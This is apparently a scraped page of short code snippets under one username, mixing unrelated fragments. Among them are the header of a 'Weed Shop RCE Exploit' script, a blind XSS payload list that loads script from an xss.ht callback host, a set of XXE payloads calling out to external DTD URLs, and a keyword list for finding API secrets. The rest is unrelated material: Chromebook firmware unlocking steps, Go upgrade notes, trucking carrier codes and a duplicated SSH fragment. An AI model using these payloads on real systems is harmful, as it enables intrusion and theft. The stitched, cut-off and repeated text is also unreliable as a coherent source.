ruevaughn

#!/usr/bin/env python
# @author Pichaya Morimoto ([email protected])
# 2023-03-07
# Weed Shop RCE Exploit

import requests

def create_dbfile(filename):
	# Vulnerability 1: IP Spoofing 
	# File: function.php

ruevaughn

####Disabling SPI write protection

Put the Chromebook in developer-mode:

• With machine powered off, hold down Esc and Refresh(F3) while hitting power button
• At warning prompt, hit Control+D, then Enter at prompt about enabling developer mode
• Machine will format itself

Now remove the write-protect screw to enable flashrom to flash new Coreboot/Libreboot.

Flip powered-off machine over and remove 8 philips-head screws. 2 are located under rubber feet.

ruevaughn

How to update the Go version

System: Debian/Ubuntu/Fedora. Might work for others as well.

1. Uninstall the exisiting version

As mentioned here, to update a go version you will first need to uninstall the original version.

To uninstall, delete the /usr/local/go directory by:

ruevaughn

"><script src=https://username.xss.ht></script>
'><script src=https://username.xss.ht></script>
";eval('var a=document.createElement(\'script\');a.src=\'https://username.xss.ht\';document.body.appendChild(a)')

ruevaughn

import poe, sys

client = poe.Client("<POE_API_KEY_HERE>")
title=sys.argv[1]
path=sys.argv[2]
more=""
if len(sys.argv) > 3:
  more="\" and here is more information: "+sys.argv[3]

message="""generate a bug bounty report for me (hackerone.com), the title of the bug is """+title+""" and the vulnerability path is \""""+path+more+"""

ruevaughn

-api
secretaccesskey
dev_key
accesskeyid
eyj
-api-key
-auth
-authorization
-back
-client

ruevaughn

*M-UNKNOWN MEXICAN TRUCKING COMPANY
8CON	CONTSHIP CONTAINER LINE
99M	UNKNOWN MEXICAN OVERLAND CARRIER
AAAB	AAA MOTORS
AAAC	AAACTION TRANSPORTATION INC
AAAD	A A A DELIVERY INC
AAAG	ATC LOGISTICS INC
AAAO	AAMODT INC
AAAU	ASIA CONTAINER LEASING CO LTD
AAAW	AAA WALKER TRANSPORTATION SERVICES

ruevaughn

<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y

ruevaughn

Should also work for:

[v] any OpenSSH installation

Given, your key is in id_rsa
1
Passphrase is needed?


Try some host which has your public key (id_rsa.pub)

ruevaughn

Should also work for:

[v] any OpenSSH installation

Given, your key is in id_rsa
1
Passphrase is needed?


Try some host which has your public key (id_rsa.pub)